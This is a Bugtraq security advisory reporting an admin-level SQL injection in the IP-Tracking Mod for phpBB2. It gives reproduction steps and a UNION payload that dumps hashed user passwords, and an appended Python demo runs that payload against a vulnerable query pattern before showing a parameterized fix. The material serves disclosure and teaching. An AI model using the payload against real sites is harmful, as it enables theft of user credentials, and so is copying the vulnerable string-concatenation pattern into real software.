Bugtraq mailing list archives

SQL-Injection in IP-TRACKING Mod for phpBB2.0.x
From: Cornelius Riemenschneider <c.r1 () gmx de>
Date: Sun, 20 May 2007 19:48:06 +0200

Information: The IP-Tracking Mod is an extension for phpBB2.0.x which logs all page hits the users of the board make, including referer, IP and username. It contains an SQL injection at admin level. You can get it from: http://www.phpbb.de/viewtopic.php?t=63690&postdays=0&postorder=asc&start=0

Steps to reproduce: Go into your ACP, select IP-Search under IP-Tracking, select "no" at "use wildcards" and enter whatever you want in Search Query. It is passed directly through to the query. As Search Type I used IP.

PoC: enter
' UNION SELECT user_password as ip,user_id,username,user_active,user_regdate,user_level,user_posts from phpbb_users#
as Search Query. This will display all the hashed user passwords in IP.
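The defect the advisory describes is a search string spliced straight into the SQL text, so a single quote closes the literal and a UNION appends rows from any other seven-column table. The following is an added example, not code from the advisory or from the IP-Tracking Mod itself: it rebuilds the two tables as a constructed in-memory SQLite stand-in (the column list is taken from the advisory's PoC; the `ip_track` table name and the row data are assumptions), runs the advisory's payload against the vulnerable string-building pattern, and shows the hardened form that validates the input by search type and binds it as a parameter. The payload is adapted with `--` because SQLite has no MySQL-style `#` comment.

```python
import ipaddress
import sqlite3

# Column list as used by the advisory's UNION payload.
COLUMNS = "ip, user_id, username, user_active, user_regdate, user_level, user_posts"

# Allowlist mapping the admin's "Search Type" choice to a column name.
# The column is never taken from user text; an unknown type raises KeyError.
SEARCH_COLUMNS = {"ip": "ip", "username": "username"}


def build_db():
    """Constructed in-memory stand-in for phpbb_users and the tracking table.
    This is not the mod's real schema; only the column names of the PoC are kept."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_password TEXT, "
        "user_active INTEGER, user_regdate INTEGER, user_level INTEGER, user_posts INTEGER)"
    )
    con.execute(
        "CREATE TABLE ip_track (ip TEXT, user_id INTEGER, username TEXT, user_active INTEGER, "
        "user_regdate INTEGER, user_level INTEGER, user_posts INTEGER)"
    )
    con.executemany(
        "INSERT INTO phpbb_users VALUES (?, ?, ?, ?, ?, ?, ?)",
        [  # constructed sample rows; the hashes are placeholders, not real digests
            (2, "admin", "constructed-hash-admin", 1, 1179000000, 1, 42),
            (3, "alice", "constructed-hash-alice", 1, 1179100000, 0, 7),
        ],
    )
    con.executemany(
        "INSERT INTO ip_track VALUES (?, ?, ?, ?, ?, ?, ?)",
        [
            ("192.0.2.10", 3, "alice", 1, 1179100000, 0, 7),
            ("192.0.2.20", 2, "admin", 1, 1179000000, 1, 42),
        ],
    )
    return con


def vulnerable_search(con, query):
    """The pattern the advisory reports: the search string is concatenated into
    the SQL text, so it can terminate the literal and extend the statement."""
    sql = f"SELECT {COLUMNS} FROM ip_track WHERE ip = '{query}'"
    return con.execute(sql).fetchall()


def safe_search(con, query, search_type="ip"):
    """Hardened form: pick the column from a fixed allowlist, reject input that
    is not shaped like the chosen search type, and bind the value as a parameter
    so the database only ever compares it, never parses it."""
    column = SEARCH_COLUMNS[search_type]
    if search_type == "ip":
        ipaddress.ip_address(query)  # raises ValueError for anything that is not an address
    sql = f"SELECT {COLUMNS} FROM ip_track WHERE {column} = ?"
    return con.execute(sql, (query,)).fetchall()


# The advisory's payload, adapted for SQLite: '--' replaces MySQL's '#' so the
# trailing quote from the query template is commented out.
PAYLOAD = (
    "' UNION SELECT user_password AS ip, user_id, username, user_active, "
    "user_regdate, user_level, user_posts FROM phpbb_users--"
)


if __name__ == "__main__":
    con = build_db()
    print("vulnerable, normal input :", vulnerable_search(con, "192.0.2.10"))
    print("vulnerable, payload      :", vulnerable_search(con, PAYLOAD))
    print("safe, normal input       :", safe_search(con, "192.0.2.10"))
    try:
        safe_search(con, PAYLOAD)
    except ValueError as exc:
        print("safe, payload (ip type)  : rejected,", exc)
    print("safe, payload (username) :", safe_search(con, PAYLOAD, "username"))
```

Against the vulnerable function the payload returns the `user_password` values of every user in the `ip` column, exactly the leak the advisory reports; against the hardened function it is either rejected outright (IP search type) or compared as a plain string and matches nothing (username search type). Parameter binding is the fix that closes the injection; the type check is an additional layer that also gives a clean point to log rejected admin searches.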

